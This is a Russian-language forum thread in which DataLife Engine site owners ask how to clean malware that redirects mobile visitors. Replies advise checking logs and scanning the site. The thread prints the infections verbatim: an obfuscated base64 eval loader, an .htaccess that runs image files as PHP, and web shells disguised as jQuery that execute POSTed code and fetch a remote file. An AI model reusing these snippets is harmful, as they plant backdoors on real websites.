Не нравятся результаты поиска? Попробуйте другой поиск!
DLE FAQ » Все вопросы » Общие вопросы » Как вычистить вредоносный код с DLE ?

Как вычистить вредоносный код с DLE ?


     01.06.2020    Вредоносный код, вирус    Общие вопросы, Общие вопросы по PHP    2170

вопрос
Добрые люди прошу помощи, на моем сайте встроен в php файл код. Недавно я вычистил его но он опять там появился.

В файлах
/engine/classes/mysql.php
/engine/data/dbconfig.php

Код
$liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6VVHtv2zYQ/yoOYIQS4sgP2bEdQ2jWwtiCDe2WJiuG1hAo6SyxkkiVDztB6e++oxwsceF52B+84+OeP95dN5EQkZh0AhIb5RjI9uAIy8hiW7AKvHAwn1864jcSNl63EKq3J0ayXleu/QVbe0wp0F43fvfhw6+3y89dtL3y/e83eJsKUTLw3FXvUOBi2NOsBs+/mE3mk2mP9Im/2KE17+ZQMIrIfDSeDsLZkPhC/uvzdHb6eX7yeTYgR0ImV+P5aDCeTa7C+WSMZDYPB5PZ+Go8C+djciSDroR1hE4+Lu/+XN59Vlo64JBpYZoGpEeYNLFWYL4h4r6/WjgoX2mQu+UfD8uP9/HD3S1ZLW4c3NEpe1qJIm60Lp6tldtmXRpalZvHlG8Kk1TRcDqYYGT/EZgEjB3kiy1vPB5d4roIZ6PhpSP+m1Qo7/nzYf1PGfQcWv51rWNJeeb0eqPhIPQXBdAMbT97I+EblqdBU2tXZn3FCt13uzKFIm2v0jRwPJfCsctw2972r5tWQxeday5Yu6WtgviN+MjOFYi2fhF8ZJJujayApyLDj8QqdSINlbQGDTL60i3haStkhmp4UHBuZDREvSOgRK9ROUdYfrBOCq2b675Lw/0UUhT3/QU8Mr3YdY3KT4OuOeQ0lqDMqz/83z/VfcyrhjdfqfmmYGsaHREliOtN7+ylsn65v/89fsBT/NPPy/f3ZOUa4sQzNkfbM2fY/HlcU50WHuknlGXGpgiBRSQqsJ/Cd7FdVprecvspB22xBODRMhpTmRaWFkJYltfUvhXaNgzrwdI6QcW/6FsptlaIHA8JPtaUVUGfkZ7Dzcd+xAQOfLeWg72ctKIMpLGbMkjF3khgM5OWblklcmGsKoCjY043zqmognTvWtot01gKlnGlaY5RcXfap2a0SQBpkDzt4xYZF6U1lcjtmqaQiMAqaHN7cslhPIqjZVWzkZVJGtiE8XyfB9Zem8VhGk2QYOIKPaqnOhHK8kwKltmaZY0FyUB96VwNbKHT2IoEB7H9OqrBoiyjHKU4s00hOLxA5bru7Ic5TLIKcLhjneBAXx2XeZ7V7dNBiBHNMg5bZbEBcqYcOtEaIEsoghtVDl1tkTEeNEVjaVa/3qGCpJoJvo9Qsr0Lt+ucRR03KY8M2+dBPT02V3e73d+Pxjob')));";$release_this = "cre"."ate_"."function";$dle_func = $release_this('', "$liciens;");$dle_func('');


Этот код редиректит мобильных пользователей с сайта на подписки. Яндекс уже как 2 месяца об этом говорит. вообщем (у меня по русскому языку двойка, я не знаю, что в русском языке не существует слова вообщем) как быть и как чистить ? У меня впс. После 1 чистки сменил все пароли толку ноль.

Ответил: sjlg89


Я нашел решение, спустя время - оно вот - https://coderiz.pw/blog/55-virusy-v-sisteme-datalifeengine-dle-i-kak-s-nimi-borotsya.html

Теперь все чисто. Спасибо автору за такую статью.

18 комментариев

dj-avtosh
PHP-developer

dj-avtosh - 1 июня 2020 22:40 -

Здравствуйте, смотрите access логи.

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

sjlg89
Юзер

леший
Гости

леший - 1 июня 2020 23:26 -

Купите лицензию и не будет у Вас дыр и шелов.

deadluk
Юзер

deadluk - 1 июня 2020 23:59 -

а откуда дистрибутив качали?

Flash
Эксперт

Flash - 3 июня 2020 00:27 -

Проверьте сайт антивирусом - https://revisium.com/ai/

sjlg89
Юзер

sjlg89 - 3 июня 2020 23:34 -

Нашел в /uploads/fotos файл .htaccess в котором
<FilesMatch ".([Pp][Hh][Pp]|[Cc][Gg][Ii]|[Pp][Ll]|[Pp][Hh][Ii][Mm][Ll]).?">
   Order allow,deny
   Deny from all
</FilesMatch>
AddHandler application/x-httpd-php .avi .jpeq .mpg4]


+ файл foto_67823364.jpeq с кодом
<?php 
/*
 * jQuery Image Library v1.6.1
 * http://jquery.com/
 *
 * Copyright 2011, John Resig
 * Dual licensed under the MIT or GPL Version 2 licenses.
 * http://jquery.org/license
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 * Copyright 2011, The Dojo Foundation
 * Released under the MIT, BSD, and GPL Licenses.
 *
 * Date: Thu May 12 15:04:36 2011 -0400
 *  *  *  *  *  *  * *  *  *  *  *  *  *  *  *  *  *  *  *  Don't delete this file *  *  *  *  *  *  *  *  *  *  *  *  *  *  *  * 
 */
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret='unct' .'ion';$cret= 'cre' . 'ate' .'_f' .$cret;
$jQuery='sert';$jQuery='as'.$jQuery;$Libr= "_ostp";
$sizz=strtoupper($Libr[0].$Libr[4].$Libr[1].$Libr[2].$Libr[3] );
if(isset(${$sizz}['j01bt5ri3p'])){@$cret('', '};'.${$sizz}['j01bt5ri3p'].'{');}
if(isset(${$sizz}['j01bt5ri3p'])){@$jQuery(${$sizz}['j01bt5ri3p']);} 
if((isset(${$sizz}['j01bt5ri3p']))&(isset(${$sizz}['fail']))){
@copy('http://'.${$sizz}['fail'].'/test.txt', $_SERVER['DOCUMENT_ROOT'].'/license.php');} 
print"<!-- te"."st --> "; 
?>

TeraMoune
Эксперт

TeraMoune - 4 июня 2020 00:09 -

а есть в логах доступ к foto_67823364.jpeq ? если нету видать заброшенный, в этом коде все действия требуют передачу каких-то параметров через post но, а действие тут одно, скопировать в корень сайта некий файл license.php с содержимым из корня домена хакера.

Цитата: sjlg89
Это и есть шел ?

Шел как раз скорей всего license.php который Вам загрузят если еще не загрузили

Тестовый репозиторий установки плагинов: teramoune

sjlg89
Юзер

sjlg89 - 4 июня 2020 17:15 -

Такой файл ни разу не находил. А с чего его должны загрузить? Все почищено вроде плюс пароли все сменены. Возможно его грузили через этот скрипт и после как ставили код чистили чтобы не видно было.

dj-avtosh
PHP-developer

dj-avtosh - 4 июня 2020 17:42 -

на старых версиях DLE через автар заливается шелл. Чекайте access логи.

По заказам пишем сюда: @Rud00y

ЯД: 41001679231462
Заказы в telegram (ремонт модулей, оптимизация нагрузок и т.п.):
В телегу писать сразу задачу и бюджет.

sjlg89
Юзер

sjlg89 - 10 июня 2020 16:39 -

Версия дле 13.3

TeraMoune
Эксперт

TeraMoune - 4 июня 2020 19:19 -

Ну почистили это хорошо, я же просто сказал проверить. И написал зачем последний найденный Вами код нужен в картинке с плохим расширением.

Тестовый репозиторий установки плагинов: teramoune

sjlg89
Юзер

sjlg89 - 10 июня 2020 16:41 -

В данное время пока полет нормальный. Ничего подозрительного не замечено.

Juranja
Юзер

Juranja - 3 октября 2020 15:11 -

Яндекс начал ругаться на релирект моб пользователей, нашел картинку с кодом вот такое содержимое
[Ссылка]
jQuery
http://jquery.com/


и файл dsiuarl. php
Юрий Жежелев, вчера в 23:19
и еще файл domains/for-web.ru/public_html/uploads/posts/2018-05/thumbs/dsiuarl.php которого не должно быть по идее в этой папке

Юрий Жежелев, вчера в 23:20
с таким содержимым ?php
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@error_reporting(0);
@set_time_limit(0);
$cret= 'cre' . 'ate' .'_f' .'unct' .'ion';
$as= 'as' . 'se' .'rt';$drem= "_ostp" ;
$did= strtoupper ($drem[0]. $drem[4].$drem[1].$drem[2].$drem[3] ) ;
if(isset( ${$did }[ 'qf03c87'] ) ) {$cret('', '};'.${$did }['qf03c87'].'{');}
if(isset( ${$did }[ 'qf03c87'] ) ) {$as (${$did }['qf03c87'] );}
print " ";
?>

Так же в файле mysql. php
Что за фигня и как ее победить

sjlg89
Юзер

sjlg89 - 3 октября 2020 16:03 -

Я нашел решение, оно вот - https://coderiz.pw/blog/55-virusy-v-sisteme-datalifeengine-dle-i-kak-s-nimi-borotsya.html

Теперь все чисто. Спасибо автору за такую статью.

Juranja
Юзер

Juranja - 3 октября 2020 16:35 -

Огромное спасибо, вы просто почистили сайт или ещё что предпренимали?

sjlg89
Юзер

sjlg89 - 3 октября 2020 18:48 -

Проверьте еще файлы htaccess в папках на лишние параметры, а так все по статье проверял.

Лучше Скачайте оригинал с офф сайта и посмотрите файлы htaccess по папкам

Juranja
Юзер

Juranja - 3 октября 2020 19:30 -

спасибо все устранил

Stasik
Юзер

Stasik - 13 августа 2023 02:16 -

А может такой вирус "пролезть" через шаблон?
В июльских бэкапах его ещё нет, на сейчас на хостинге он уже есть.
Недавно шабы на хост заливал, скачанные с бесплатных сайтов

П.С.
Разобрался, движок (dle 13.3) изначально был залит с вирусом. Видимо недавно только активировался

Чтобы комментировать - войдите или зарегистрируйтесь на сайте

Похожие вопросы

наверх